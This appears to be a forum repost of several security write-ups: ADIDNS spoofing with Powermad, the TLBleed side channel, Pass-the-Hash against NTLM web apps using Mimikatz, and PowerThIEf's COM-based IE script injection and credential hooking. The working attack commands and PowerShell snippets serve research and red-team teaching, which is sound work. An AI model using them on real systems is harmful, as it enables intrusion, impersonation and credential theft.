In this scenario, New-SOASerialNumberArray will skip connecting to a DNS server and instead it will use the specified serial number. Maintaining Control of Nodes To review, once a node is created with an authenticated user, the creator account will have ownership/full control of the node. The ‘Authenticated Users’ principal itself will not be listed at all within the node’s DACL. Therefore, losing access to the creator account can create a scenario where you will not be able to remove an added record. To avoid this, the dNSTombstoned attribute can be set to ‘True’ upon node creation. PS C:\Users\kevin\Desktop\Powermad> New-ADIDNSNode -Node * -Tombstone -Verbose VERBOSE: [+] Domain Controller = Inveigh-DC1.inveigh.net VERBOSE: [+] Domain = inveigh.net VERBOSE: [+] ADIDNS Zone = inveigh.net VERBOSE: [+] Distinguished Name = DC=*,DC=inveigh.net,CN=MicrosoftDNS,DC=DomainDNSZones,DC=inveigh,DC=net VERBOSE: [+] Data = 192.168.125.100 VERBOSE: [+] DNSRecord Array = 04-00-01-00-05-F0-00-00-BC-00-00-00-00-00-02-58-00-00-00-00-22-D8-37-00-C0-A8-7D-64 [+] ADIDNS node * added This puts a node in a state where any authenticated user can perform node modifications. Alternatively, the node’s DACL can be modified to grant access to additional users or groups. PS C:\Users\kevin\Desktop\Powermad> Grant-ADIDNSPermission -Node * -Principal "Authenticated Users" -Access GenericAll -Verbose VERBOSE: [+] Domain Controller = Inveigh-DC1.inveigh.net VERBOSE: [+] Domain = inveigh.net VERBOSE: [+] ADIDNS Zone = inveigh.net VERBOSE: [+] Distinguished Name = DC=*,DC=inveigh.net,CN=MicrosoftDNS,DC=DomainDNSZones,DC=inveigh,DC=net [+] ACE added for Authenticated Users to * DACL Having the creator account’s ownership and full control permission listed on a node can make things really easy on the blue team in the event they discover your record. Although changing node ownership is possible, a token with the SeRestorePrivilege is required. Node Tombstoning Record cleanup isn’t as simple as just removing the node from LDAP. If you do, the record will hang around within the DNS server’s in-memory zone copy until the service is restarted or the ADIDNS zone is manually reloaded. The 180 second AD sync will not remove the record from DNS. When a record is normally deleted in an ADIDNS zone, the record is removed from the in-memory DNS zone copy and the node object remains in AD. To accomplish this, the node’s dNSTombstoned attribute is set to ‘True’ and the dnsRecord attribute is updated with a zero type entry containing the tombstone timestamp. Generating you own valid zero type array isn’t necessarily required to remove a record. If the dnsRecord attribute is populated with an invalid value, such as just 0x00, the value will be switched to a zero type array during the next AD/DNS sync. For cleanup, I’ve created a PowerShell function called Disable-ADIDNSNode which will update the dNSTombstoned and dnsRecord attributes. PS C:\Users\kevin\Desktop\Powermad> Disable-ADIDNSNode -Node * -Verbose VERBOSE: [+] Domain Controller = Inveigh-DC1.inveigh.net VERBOSE: [+] Domain = inveigh.net VERBOSE: [+] ADIDNS Zone = inveigh.net VERBOSE: [+] Distinguished Name = DC=*,DC=inveigh.net,CN=MicrosoftDNS,DC=DomainDNSZones,DC=inveigh,DC=net [+] ADIDNS node * tombstoned The cleanup process is a little different for records that exist as a single dnsRecord attribute line within a multi-record DNS node. Simply remove the relevant dnsRecord line and wait for sync/replication. Set-DNSNodeAttribute can be used for this task. 
One note regarding tombstoned nodes in case you decide to work with existing records through either LDAP or dynamic updates. The normal record aging process will also set the dNSTombstoned attribute to ‘True’. Records in this state are considered stale, and if enabled, ready for scavenging. If scavenging is not enabled, these records can hang around in DNS for a while. In my test labs without enabled scavenging, I often find stale records that were originally registered by machine accounts. Caution should be taken when working with stale records. Although they are certainly potential targets for attack, they can also be overwritten or deleted by mistake. Node Deletion Fully removing the DNS records from both DNS and AD to better cover your tracks is possible. The record needs to first be tombstoned. Once the AD/DNS sync has occurred to remove the in-memory record, the node can be deleted through LDAP. Replication however makes this tricky. Simply performing these two steps quickly on a single domain controller will result in only the node deletion being replicated to other domain controllers. In this scenario, the records will remain within the in-memory zone copies on all but one domain controller. During penetration tests, tombstoning is probably sufficient for cleanup and matches how a record would normally be deleted from ADIDNS. Defending Against ADIDNS Attacks Unfortunately, there are no known defenses against ADIDNS attacks. Oh alright, there are easily deployed defenses and one of them actually involves using a wildcard record to your advantage. The simplest way to disrupt potential ADIDNS spoofing is to maintain control of critical records. For example, creating a static wildcard record as an administrator will prevent unprivileged accounts from creating their own wildcard record. PS C:\Users\kevin\Desktop\Powermad> New-ADIDNSNode -Node * -Tombstone -Verbose VERBOSE: [+] Domain Controller = Inveigh-DC1.inveigh.net VERBOSE: [+] Domain = inveigh.net VERBOSE: [+] ADIDNS Zone = inveigh.net VERBOSE: [+] Distinguished Name = DC=*,DC=inveigh.net,CN=MicrosoftDNS,DC=DomainDNSZones,DC=inveigh,DC=net VERBOSE: [+] Data = 192.168.125.100 VERBOSE: [+] DNSRecord Array = 04-00-01-00-05-F0-00-00-BD-00-00-00-00-00-02-58-00-00-00-00-20-D8-37-00-C0-A8-7D-64 [-] Exception calling "SendRequest" with "1" argument(s): "The object exists." The records can be pointed at your black-hole method of choice, such as 0.0.0.0. An added bonus of an administrator controlled wildcard record is that the record will also disrupt LLMNR/NBNS spoofing. The wildcard will satisfy all name requests for a zone through DNS and prevent requests from falling down to LLMNR/NBNS. I would go so far as to recommend administrator controlled wildcard records as a general defense for LLMNR/NBNS spoofing. You can also modify an ADIDNS zone’s DACL to be more restrictive. The appropriate settings are environment specific. Fortunately, the likelihood of having an actual requirement for allowing ‘Authenticated Users’ to create records is probably pretty low. So, there certainly may be room for DACL hardening. Just keep in mind that limiting record creation to only administrators and machine accounts may still leave a lot of opportunities for attack without also maintaining control of critical records. And the Winner Is? The major advantage of ADIDNS spoofing over LLMNR/NBNS spoofing is the extended reach and the major disadvantage is the required AD access. Let’s face it though, we don’t necessarily need a better LLMNR/NBNS spoofer. 
Looking back, NBNS spoofing was a security problem long before LLMNR joined the game. LLMNR and NBNS spoofing both continue to be effective year after year. My general recommendation, having worked with ADIDNS spoofing for a little while now, would be to start with LLMNR/NBNS spoofing and add in ADIDNS spoofing as needed. The LLMNR/NBNS and ADIDNS techniques actually complement each other pretty well. To help you make your own decision, the following table contains some general traits of ADIDNS, LLMNR, and NBNS spoofing:

Trait                                                                    ADIDNS  LLMNR  NBNS
Can require waiting for replication/syncing                                x
Easy to start and stop attacks                                                     x      x
Exploitable when default settings are present                              x      x      x
Impacts fully qualified name requests                                      x
Requires constant network traffic for spoofing                                     x      x
Requires domain credentials                                                x
Requires editing AD                                                        x
Requires privileged access to launch attack from a compromised system                     x
Targets limited to the same broadcast/multicast domains as the spoofer             x      x

Disclaimer: There are still lots of areas to explore with ADIDNS zones beyond just replicating standard LLMNR/NBNS spoofing attacks.

Tools!

I've released an updated version of Powermad which contains several functions for working with ADIDNS, including the functions shown in the post:
https://github.com/Kevin-Robertson/Powermad

I will be populating the Powermad wiki with step by step instructions:
https://github.com/Kevin-Robertson/Powermad/wiki

Also, if you are feeling brave, an ADIDNS spoofing capable version of Inveigh 1.4 can be found in the dev branch:
https://github.com/Kevin-Robertson/Inveigh/tree/dev

Sursa: https://blog.netspi.com/exploiting-adidns/
14. TLBleed

Overview

TLBleed is a new side channel attack that has been proven to work on Intel CPUs with Hyperthreading (generally Simultaneous Multi-threading, or SMT, or HT on Intel) enabled. It relies on concurrent access to the TLB, and on it being shared between threads. We find that the L1 dTLB and the STLB (L2 TLB) are shared between threads on Intel CPU cores.

Result

This means that co-resident hyperthreads can get a certain amount of information on the data memory accesses of the other HT, without needing any shared cache. Whereas the cache can be partitioned to protect against cache attacks (such as in Cloak using TSX, or using CAT, or using page coloring), this is practically impossible for the TLB, and no such systems have been proposed. Thus, in the presence of cache defenses, TLBleed remains a risk in this threat model.

Requirements (a.k.a. threat model)

The threat model is identical to Colin Percival's seminal 2005 work, Cache Missing for Fun and Profit, which arguably introduced practical cache side channels. Different from TLBleed, it requires concurrent access to the cache shared between Hyperthreads. TLBleed gets all information through the shared TLB, which can't be partitioned between processes in software (either application or OS).

Impact & Coverage

As a result of seeing this work, OpenBSD decided to disable Hyperthreading by default. This has prompted some speculation that TLBleed is a Spectre-like attack, but that is not the case. OpenBSD also realizes the exact impact of TLBleed. Red Hat has a very thoughtful piece here. There has been significant news coverage: TheRegister (and this one), ArsTechnica, ZDnet, Techrepublic, TechTarget, ITwire, tweakers, and a personal favorite, the SecurityNow Podcast episode 669 (mp3, show notes, youtube).

Overview of results

We briefly tour the results of our paper with some technical details that a technical audience might be interested in. Full technical details can be found in the paper, linked below.

libgcrypt ECC point multiplication

To demonstrate the effectiveness of TLBleed, we side-channel the non-side-channel-resistant version of the libgcrypt EdDSA ECC scalar-point multiplication function. In later versions it has been hardened against this attack. We demonstrate that even if cache protections were in place, and this code would otherwise be safe, it would still be vulnerable through TLB leakage.

The chart below shows the progression of analysis. The spy process acquires the TLB usage signal while the other hyperthread is executing the point-scalar multiplication using a secret key (this would happen e.g. when a signing operation takes place). The raw TLB signal looks noisy, but we are able to apply a machine learning technique to distinguish when a 0 or a 1 secret key bit is being processed.

The latency is the raw TLB usage signal as the spy process acquires it. The shaded regions show ground truth corresponding to which secret key bit the other HT is processing. The spy process wants to decide which of the two (dup or mul, corresponding to a certain secret key bit) it is. The moving average shows the signal contains a distinguishing characteristic. The SVM classifier output shows that an SVM classifier can reliably learn to tell the difference between the two.

After we capture the signal, to reconstruct the key we sometimes have to guess some values (sometimes the SVM classifier output makes no sense, sometimes it's wrong in 1 or 2 bits), so we apply some heuristics and brute force until we guess the right key.

We try this on 3 different microarchitectures and reach the following success rates, while analyzing the data from just a single TLB capture. We call it a 'success' if we can guess the key after a limited amount of brute force effort (see below). We try our attack on 3 different microarchitectures and report on the reliability results. The success rate is from 0 to 1, i.e. 0.998 means a 99.8% success rate.

This is the distribution of brute force effort needed for the 3 different cases. Brute force effort needed for 3 different microarchitectures where we eventually were successful in guessing the right key using our heuristics and brute force algorithm.
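As a toy illustration of the classification step described above (not the authors' pipeline, and using synthetic latency data in place of a real TLB capture), an SVM can be trained to label windows of a latency trace as belonging to the dup or mul phase:

import numpy as np
from sklearn.svm import SVC

rng = np.random.default_rng(0)
WINDOW = 50

def synth_trace(bit, n=WINDOW):
    # Pretend 'mul' windows (bit = 1) show a slightly higher average latency
    # than 'dup' windows; real traces would come from the spy hyperthread.
    base = 220 if bit else 200
    return base + rng.normal(0, 15, n)

# Build a labelled set of latency windows and train on part of it.
bits = rng.integers(0, 2, 400)
X = np.stack([synth_trace(b) for b in bits])
y = bits

clf = SVC(kernel="rbf").fit(X[:300], y[:300])
print("held-out accuracy:", clf.score(X[300:], y[300:]))

The remaining bits that the classifier gets wrong are what the heuristics and brute-force stage of the real attack have to recover.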
We try this on 3 different microarchitectures and reach the following success rates, while analyzing the data from just a single TLB capture. We call it a ‘success’ if we can guess the key after a limited amount of brute force effort (see below). We try our attack on 3 different microarchitectures and report on the reliability results. The success rate is from 0 to 1, i.e. 0.998 means 99.8% success rate. This is the distribution of brute force effort needed for the 3 different cases. Brute force effort needed for 3 different microarchitectures where we eventually were successful in guessing the right key using our heuristics and brute force algorithm. RSA We also apply our technique to an older implementation of RSA, using square-and-multiply, in libgcrypt, which was written to be side-channel-resistant. (Updates since that time have improved its side channel resistance.) Its side channel resistance stems from having a near-constant control flow. TLBleed however relies on the data access pattern and can see the difference between the multiply result being used (1-bit in exponent) or not (0-bit in exponent). The error rate for a 1024-bit key was much higher than for a 256-bit EdDSA key however, and we could not brute force our way to a full reliable key recovery. We do believe that with some advanced number theoretical techniques (see paper and previous work, e.g. Cachebleed), this number of unknown bits out of 1024 can lead to a reliable key recovery with just a single capture. Error rate of 1024-bit RSA key recovery after a single capture of TLBleed data from the RSA implementation. Also: defense bypass, covert channel The paper contains more material: we implement a covert channel over the TLB, and demonstrate bypasses of cache protections. See the paper for full details. Presentations & Full Paper A copy of the paper, published at and to be presented at Usenix Security this year, as well as at a Blackhat Briefing, is online now: paper is here. [1] B. Gras, K. Razavi, H. Bos, C. Giuffrida, Translation Leak-aside Buffer: Defeating Cache Side-channel Protections with TLB Attacks, in: USENIX Security, 2018. Acknowledgements The authors would like to thank Yuval Yarom, Colin Percival, and Taylor `Riastradh’ Campbell for early feedback on this paper, and impact consideration. Sursa: https://www.vusec.net/projects/tlbleed/
  15. Passing-the-Hash to NTLM Authenticated Web Applications Christopher Panayi, 11 July 2018 A blog post detailing the practical steps involved in executing a Pass-the-Hash (PtH) attack in Windows/Active Directory environments against web applications that use domain-backed NTLM authentication. The fundamental technique detailed here was previously discussed by Alva 'Skip' Duckwall and Chris Campbell in their excellent 2012 Blackhat talk, "Still Passing the Hash 15 Years Later…" [1][3]. Introduction One of the main advantages of a Windows Active Directory environment is that it enables enterprise-wide Single Sign-On (SSO) through the use of Kerberos or NTLM authentication. These methods are typically used to access a large variety of enterprise resources, from file shares to web applications, such as Sharepoint, OWA or custom internal web applications used for specific business processes. When considering web applications, the use of Integrated Windows Authentication (IWA) - i.e. Windows SSO for web applications - allows users to automatically authenticate to web applications using either Kerberos or NTLM authentication. It is well-known that the design of the NTLM authentication protocol allowed for Pass-the-Hash attacks - where a user is authenticated using their password hash instead of their password. Public tooling for this kind of attack has existed since around 1997 - when Paul Ashton released a modified SMB client that used a LanMan hash to access network shares [2]. Background The use of Pass-the-Hash (PtH) attacks against Windows environments has been well documented over the years. A small primer of references discussing these attacks, selected from amongst the many good resources available, follows: The official Microsoft documentation detailing how "The client computes a cryptographic hash of the password and discards the actual password." before attempting NTLM authentication. Useful for understanding why PtH for NTLM authentication is possible in Windows environments: https://docs.microsoft.com/en-us/windows/desktop/secauthn/microsoft-ntlm. Hernan Ochoa's slides discussing the original Pass-the-Hash Toolkit: https://www.coresecurity.com/system/files/publications/2016/05/Ochoa_2008-Pass-The-Hash.pdf. These describe a working means to execute PtH attacks from Windows machines that had been developed in 2000. All of the Passing-the-Hash blog. The pth-suite Linux tools are of specific interest (When they were originally released, these were coded for Backtrack Linux. Most of these tools have found a new home in Kali Linux, with one notable exception - which contributed to the writing of this blog post): https://passing-the-hash.blogspot.com/. "Pass-the-Hash Is Dead: Long Live LocalAccountTokenFilterPolicy" - A discussion of PtH for local user accounts, and the additional restrictions imposed on this form of PtH since Windows Vista: https://www.harmj0y.net/blog/redteaming/pass-the-hash-is-dead-long-live-localaccounttokenfilterpolicy/. Exploiting PtH using the PsExec module in Metasploit: https://www.offensive-security.com/metasploit-unleashed/psexec-pass-hash/. The Github documentation for the PtH module in Mimikatz: https://github.com/gentilkiwi/mimikatz/wiki/module-~-sekurlsa#pth. One of the specific applications of this attack that has always interested me is the ability to PtH to websites that make use of NTLM authentication. 
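Before diving in, a quick way to spot such applications (a hedged snippet added here, not from the original post; the URL is the lab host used later in this article) is to look for NTLM/Negotiate challenges in the WWW-Authenticate header of an unauthenticated response:

# Checks which HTTP authentication schemes an endpoint offers.
import requests
requests.packages.urllib3.disable_warnings()   # the lab host uses a self-signed cert

resp = requests.get("https://exchange.test.com/owa", verify=False)
print(resp.status_code)                              # IWA-only endpoints answer 401
print(resp.headers.get("WWW-Authenticate", "(no challenge header)"))   # e.g. "Negotiate, NTLM"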
Due to the ubiquity of enterprise Windows Active Directory environments, a large number of internal corporate web applications make use of this authentication scheme to allow seamless SSO to corporate resources from company workstations. Being able to execute Pass-the-Hash attacks against these websites is therefore a useful technique for effective post-exploitation on Windows environments. The full impact of this is apparent when a full domain compromise occurs - i.e. after a complete domain hashdump for a given domain has been obtained, which contains the NT hashes associated with all employee user accounts. Pass-the-Hash, in this scenario, effectively allows the impersonation of any corporate employee, without needing to crack any password hashes, or keylog any passwords from their workstations. Meaning that even for the the most security conscious users, who might have used a 20+ character - generally uncrackable - passphrase, there would be no protection against an attacker using their compromised password hash to impersonate them on a target corporate web application. Practical PtH Attacks Against NTLM Authenticated Web Applications So, the question becomes, how would one practically carry out such an attack against an NTLM authenticated website? For a long time, performing Google searches of this topic and trawling through the results offered me no additional insight into how to use current (circa 2015-2018) tooling to execute such an attack. When considering the estimable set of Pass-the-Hash tools available in Kali Linux - pth-suite - there was a strange gap. While most of the original pth-suite tools made their way into Kali Linux in 2015, the notable exception - which I alluded to earlier - was pth-firefox, which, as the name suggests, patched the NTLM authentication code in Firefox to allow Pass-the-Hash. Since this Linux tooling was unavailable to me, I turned my attention to investigating techniques that use Mimikatz on a Windows host to perform the same attack. After having discovered a working technique myself, I recently stumbled upon pg 30 of the original "Still Passing the Hash 15 Years Later…" slides, presented at Blackhat 2012 and delivered by Alva 'Skip' Duckwall and Chris Campbell [1]. These detail a method of convincing Internet Explorer (or any browser that makes use of the built-in Windows "Internet Options" settings) to authenticate using IWA, after injecting the desired NT hash directly into memory using Hernan Ochoa's Windows Credential Editor (WCE). They give a demo of this specific technique at 18:29 of their presentation [3]. Given how long it took me to find this information, and in order to document the relevant steps for practical exploitation, the remainder of this post details how to execute this attack using Mimikatz from a Windows 10 host. The Attack Environment Setup In order to illustrate a web application that makes use of NTLM authentication, I used an Exchange 2013 server, configured to exclusively make use of IWA for Outlook Web Access (OWA). The relevant PowerShell configuration commands run on the Exchange server, from the Exchange Management Shell, were as follows: Set-OwaVirtualDirectory -Identity "owa (Default Web Site)" -FormsAuthentication $false -WindowsAuthentication $true Set-EcpVirtualDirectory -Identity "ecp (Default Web Site)" -FormsAuthentication $false -WindowsAuthentication $true Other prerequisites which were in place: This Exchange server was joined to the test.com domain. 
On this domain, a user, named TEST\pth, was created with a complex password and a corresponding mailbox. The NT hash of this user's password was calculated, to later be used as part of the attack. The NT hash was generated as follows: python -c 'import hashlib,binascii; print binascii.hexlify(hashlib.new("md4", "Strong,hardtocrackpassword1".encode("utf-16le")).digest())' 57f5f9f45e6783753407ae3a8b13b032 After this, a recent version of Mimikatz was downloaded onto a non-domain joined Windows 10 host, which was connected to the same network as the Exchange server. In order to allow us to use the domain name of the Exchange server, instead of its IP address, the DNS server on this standalone machine was set to the Domain Controller of the test.com domain. Attack Assuming that our OWA web application was accessible on "https://exchange.test.com/owa", browsing to OWA normally would result in the following prompt: This prompt is generated, as the machine does not have any domain credentials in memory and the WWW-Authenticate header received from the website specifies that it accepts NTLM authentication. Running Mimikatz as administrator, we can start a command prompt in the context of the TEST\pth user, by using the Pass-the-Hash module in Mimikatz - sekurlsa::pth - and supplying the user's NT hash as an argument: privilege::debug sekurlsa::pth /user:pth /ntlm:57f5f9f45e6783753407ae3a8b13b032 /domain:TEST /run:cmd.exe This will not alter our local rights on the machine, but will mean that if we attempt to access any network resources from the newly spawned command prompt, it will be done in the context of our injected credentials. In order to ensure that our browser is running under the context of these injected credentials, we spawn an Internet Explorer process from this command prompt, by running "C:\Program Files\internet explorer\iexplore.exe". Inspecting the "Security Settings" for the "Local Intranet" zone in the "Internet Options" dialog, we can see that - by default - authentication is only automatic (i.e. using SSO) for websites that are present in the intranet zone. This is pictured below: Thus, in order for a Pass-the-Hash attack to work from Internet Explorer on a Windows machine, the target site must be added to the "Local Intranet" zone. Instead of adding websites to this zone individually, it is possible to use a wildcard domain, in this case "*.test.com", which will match all subdomains of "test.com". Such a configuration is pictured in the following screenshot: After this configuration, when browsing to "https://exchange.test.com/owa", the TEST\pth user is automatically authenticated through NTLM authentication and OWA then successfully loads. Potential Impact After the compromise of the domain, the ability to PtH to web applications allows for efficient, and relatively simple, impersonation of any employee, regardless of access privileges, to any company-owned web applications that support IWA. Whilst this might primarily include Microsoft web services, such as SharePoint and OWA (if IWA is specifically enabled), various custom-developed internal financial applications, including those used to pay external parties, have been seen to do the same. When looking at the industry move towards cloud environments, Active Directory Federation Services (ADFS) is commonly involved to facilitate authentication. ADFS, by default, supports IWA when an Internet Explorer user agent is provided [4]. 
In such a scenario, this would imply that PtH can be performed to access company resources in the cloud. Recommendations While the main purpose of this post is not to talk about the complex issue of securing a Windows Active Directory environment, and indeed, cannot do the topic justice while staying on point, some high-level considerations for addressing these attacks are provided for those interested. Some further detail, not discussed here, can be found in a previous post, Planting the Red Forest: Improving AD on the Road to ESAE. The ability to PtH in Windows environments cannot, in itself, currently be addressed. Both of the protocols that Active Directly uses for SSO inherently allow for PtH-style attacks. The most effective recommendation in this line is thus to prevent compromise of password hashes and Kerberos keys in the first place. Most importantly, this entails ensuring that Domain Controllers, Domain Administrator access, or any other means of obtaining the stored credential information within Active Directory, is not compromised, as this would directly result in the compromise of all stored password hashes and Kerberos keys. On Windows 10 and Server 2016, credential material stored in memory can be protected against credential theft attacks specifically through the use of Credential Guard. When looking at IWA for web applications in isolation, enforcing the use of Multi-Factor Authentication (MFA) during the login process can be effective. As a specific case-in-point, when ADFS is used with Office 365, initial authentication may be performed through IWA, but a second factor can be required in order to complete authentication, after which access to company resources is granted. Unfortunately, this approach cannot be used to address PtH more generally, as not all relevant protocols have support for it. SMB, for example, does not support MFA, but still provides functionality that allows for remote code execution, thus permitting attackers to move laterally inside corporate environments using PtH unhindered. P.S. A Final Note - "PtH" for Kerberos Authentication The underlying concept behind Pass-the-Hash is that once a credential store is compromised, it is possible to use the stolen stored credential material (which should never be the plaintext password!) in order to authenticate as a user, without needing to first obtain the corresponding plaintext password for that user. When referring to Microsoft's documentation concerning their implementation of the Kerberos protocol, it is described how "Kerberos Pre-Authentication" is used to obtain a Kerberos Ticket Granting Ticket (TGT). This process requires the user to send an "authenticator message" to the domain controller; this authenticator message "...is encrypted with the master key derived from the user's logon password." [5]. Later, the documentation explains that when the DC receives the TGT request, "...it looks up the user in its database, gets the associated user's master key, decrypts the preauthentication data, and evaluates the time stamp inside." [5]. This means that the key itself is used for validating authentication, not the user's plaintext password. The user's password-derived key is stored in the AD database, meaning that if this database is compromised (as happens when an attacker obtains domain administrator credentials, for example), the stored key can be recovered - along with the user's stored NT hash. 
Since only the stored key is needed to create a valid authenticator message, Kerberos authentication is inherently "Pass-the-Key". Alva Duckwall and Benjamin Delpy [6] called this attack "Overpass-the-Hash", and the sekurlsa::pth Mimikatz module supports crafting Kerberos Pre-Authentication requests using only Kerberos keys. The implication of this, of course, is that if a web application, or any other corporate resource, supports direct AD-backed Kerberos authentication, Overpass-the-Hash can be used for authentication against it. References [1] "Still Passing the Hash 15 Years Later: Using Keys to the Kingdom to Access Data" presentation slides - https://media.blackhat.com/bh-us-12/Briefings/Duckwall/BH_US_12_Duckwall_Campbell_Still_Passing_Slides.pdf [2] NT "Pass the Hash" with Modified SMB Client Vulnerability - http://www.securityfocus.com/bid/233/discuss Sursa: https://labs.mwrinfosecurity.com/blog/pth-attacks-against-ntlm-authenticated-web-applications/
  16. COM and the PowerThIEf Tuesday 10 July 2018/by Rob Maslen Recently, Component Object Model (COM) has come back in a big way, particularly with regards to it being used for persistence and lateral movement. In this blog we will run through how it can also can be used for limited process migration and JavaScript injection within Internet Explorer. We will then finish with how this was put together in our new PowerShell library Invoke-PowerThIEf and run through some situations it can aid you, the red team, in. Earlier this year I became aware of a technique that involved Junction Folders/CLSID that had been leaked in the Vault 7 dump. It was when I began looking at further applications of these that I also learned about the Component Object Model (COM) ability to interact with and automate Internet Explorer. This, of course, is not a new discovery; a lot of the functionality is well documented on sites like CodeProject. However, it hadn’t been organised into a library that would aid the red team workflow. This formed the basis of my talk “COM and the PowerThIEf” at SteelCon in Sheffield on 7th July 2018. The slides for the talk can be found at: https://github.com/nettitude/Invoke-PowerThIEf/blob/master/Steelcon-2018-com-powerthief-final.pdf The talk itself is here: Getting up to speed with COM Before we dive into this, if you are not familiar with COM then I would highly recommend the following resources. These are a selection of some of the recent excellent talks & blog posts on the subject that I would recommend if you want to know more. COM in 60 Seconds by James Forshaw – https://vimeo.com/214856542 Windows Archaeology by Casey Smith & Matt Nelson – https://www.youtube.com/watch?v=3gz1QmiMhss Lateral Movement using Excel Application and DCOM by Matt Nelson – https://enigma0x3.net/2017/09/11/lateral-movement-using-excel-application-and-dcom/ Junction Folders I first came across the Junction Folders/CLSID technique mentioned above in one of b33f’s excellent Patreon videos. As I understand it, this was first used as a method for persistence, in that if you name a folder in the format CLSID.{<CLSID>} then when you navigate to that folder, explorer will perform a lookup in the registry upon the CLSID and then run whatever COM Server has been registered. As part of his DefCon 25 WorkShop (which is worth a read, hosted at https://github.com/FuzzySecurity/DefCon25) he released a tool called Hook-InProcServer that enabled you to build the registry structure required to be used for a COM Hijack or for the JunctionFolders/CLSID technique. These were both being used as a Persistence mechanism and I began wondering if this might be possible to use as a means of Process Migration, at least into explorer.exe. Step one was to find if it was possible to programmatically navigate to one of the configured folders and – yes – it turns out that it is. In order to be able to navigate, we first need to gain access to any running instances of explorer. Windows makes this easy via the ShellWindows object: https://msdn.microsoft.com/en-us/library/windows/desktop/bb773974(v=vs.85).aspx Enumerating the Item property upon this object lists all the current running instances of Explorer and Internet Explorer (I must admit I thought this was curious behaviour). ShellWindows is identified by the CLSID “{9BA05972-F6A8-11CF-A442-00A0C90A8F39}”; the following PowerShell demonstrates activating it. 
$shellWinGuid = [System.Guid]::Parse("{9BA05972-F6A8-11CF-A442-00A0C90A8F39}")
$typeShwin = [System.Type]::GetTypeFromCLSID($shellWinGuid)
$shwin = [System.Activator]::CreateInstance($typeShwin)

The objects returned by indexing the .Item collection will be different based upon whether it is an Explorer or an IE instance. An easy check is using the FullName property, which exists on both and holds the name of the application, as shown here.

$fileName = [System.IO.Path]::GetFileNameWithoutExtension($shWin[0].FullName);
if ($fileName.ToLower().Equals("iexplore"))
{
    // Do your IE stuff here
}

This article (https://www.thewindowsclub.com/the-secret-behind-the-windows-7-godmode) from 2010 not only contains the Vault7 technique but also shows that it is possible to navigate to a CLSID using the syntax shell:::{CLSID}. Assuming that we have at least one IE window open, we are able to index the ShellWindows.Item object in order to gain access to that window (e.g. to gain access to the first IE window, use $shWin[0].Item). This will provide us an object that represents that instance of IE and is of a type called IWebBrowser2. Looking further into this type, we find in the documentation that it has a method called Navigate2 (https://msdn.microsoft.com/en-us/library/aa752134(v=vs.85).aspx). The remarks on the MSDN page for this method state that it was added to extend the Navigate method in order to “allow for shell integration”.

The following code will activate ShellWindows, assuming the first window is an IE instance (this is a proof of concept), and will then attempt to navigate to the Control Panel via the CLSID for Control Panel (which can be found in the registry).

$shellWinGuid = [System.Guid]::Parse("{9BA05972-F6A8-11CF-A442-00A0C90A8F39}")
$typeShwin = [System.Type]::GetTypeFromCLSID($shellWinGuid)
$shwin = [System.Activator]::CreateInstance($typeShwin)
$shWin[0].Navigate2("shell:::{ED7BA470-8E54-465E-825C-99712043E01C}", 2048)
/*
CLSID must be in the format "shell:::{CLSID}"
Second param 2048 is the BrowserNavConstants value for navOpenInNewTab:
https://msdn.microsoft.com/en-us/library/dd565688(v=vs.85).aspx
Further ideas on what payloads you may be able to use:
https://bohops.com/2018/06/28/abusing-com-registry-structure-clsid-localserver32-inprocserver32/
*/

The following animation shows what happens when this code is run: Control Panel being navigated to via CLSID.

We can then see via a trace from Process Monitor that IE has looked up the CLSID and then navigated to it, eventually opening it up in explorer, which involved launching the DLL within the InProcServer registry key. If we create our own registry keys we then have a method of asking IE (or Explorer) to load a DLL for us, all from the comfort of another process. We don’t always want network connections going out from Word.exe, do we? In the case of IE the DLL must be x64. There are methods of configuring the registry entries to execute script; I suggest that you look at subTee’s or bohops’ excellent work for further information.

JavaScript

Once a reference is obtained to an Internet Explorer window it is then possible to access the DOM of that instance. As expected, you then have full access to the page and browser. You can view and edit HTML, inject JavaScript, navigate to other tabs and show/hide the window, for example.
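As an aside, the same ShellWindows collection is reachable from any COM-capable language, not just PowerShell. A rough Python/pywin32 sketch (my own illustration, not part of PowerThIEf) that lists the URLs of any open IE windows looks like this; the original PowerShell snippet for injecting JavaScript follows below.

# Requires pywin32 on Windows: walk ShellWindows and print IE window URLs.
import win32com.client

shell_windows = win32com.client.Dispatch("Shell.Application").Windows()
for window in shell_windows:
    try:
        if window.FullName.lower().endswith("iexplore.exe"):
            print(window.LocationURL)     # IWebBrowser2.LocationURL for that tab
    except Exception:
        pass                              # windows can disappear mid-enumeration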
The following code snippet demonstrates how it is possible to inject and execute JavaScript:

$shellWinGuid = [System.Guid]::Parse("{9BA05972-F6A8-11CF-A442-00A0C90A8F39}")
$typeShwin = [System.Type]::GetTypeFromCLSID($shellWinGuid)
$shwin = [System.Activator]::CreateInstance($typeShwin)
$parentwin = $shWin[0].Document.parentWindow
$parentwin.GetType().InvokeMember("eval", [System.Reflection.BindingFlags]::InvokeMethod, $null, $parentwin, @("alert('Self XSS, meh \r\n\r\n from '+ document.location.href)"))

The difference this time is that we actually have to locate the eval method on the DOM window before being able to call it. This requires using .NET’s Reflection API to locate and invoke the method. The following shows what happens when this code is run.

Where is this all going?

Well, despite the programming constructs and some of the techniques being well documented, there didn’t appear to be a library out there which brought it all together in order to help a red team in the following situations:

The target is using a password manager, e.g. LastPass, where key-logging is ineffective.
The user is logged into an application and we want to be able to log them out without having to clear all browser history and cookies.
The target application is in a background tab and we can‘t wait for the user to switch tabs. We need to view or get HTML from that page.
We want to view a site from the target’s IP address, without the target being aware.

This led to me writing the PowerThIEf library, which is now hosted at https://github.com/nettitude/Invoke-PowerThIEf. The functionality included in the initial release is as follows:

DumpHtml: Retrieves HTML from the DOM, can use some selectors (but not jQuery style – yet).
ExecPayload: Uses the migrate technique from earlier to launch a payload DLL in IE.
HookLoginForms: Steals credentials by hooking the login form and monitoring for new windows.
InvokeJS: Executes JavaScript in the window of your choice.
ListUrls: Lists the urls of all currently opened tabs/windows.
Navigate: Navigate to another URL.
NewBackgroundTab: Creates a new tab in the background.
Show/HideWindow: Shows or Hides a browsing window.

Examples of usage and functionality include:

Extracting HTML from a page:
Logging the user out, in order to capture credentials:
Using the junction folders to trigger a PoshC2 payload:
Capturing credentials in transit entered via LastPass:

Usage

The latest Invoke-PowerThIEf documentation can be found at: https://github.com/nettitude/Invoke-PowerThIEf/blob/master/README.md.

Roadmap

Further functionality is planned in the future and will include:

Screenshot: Screenshot all the browser windows.
CookieThIEf: Steal cookies (session cookies).
Refactor DOM event handling: Developing complex C# wrapped in PowerShell is not ideal.
Pure C# Module
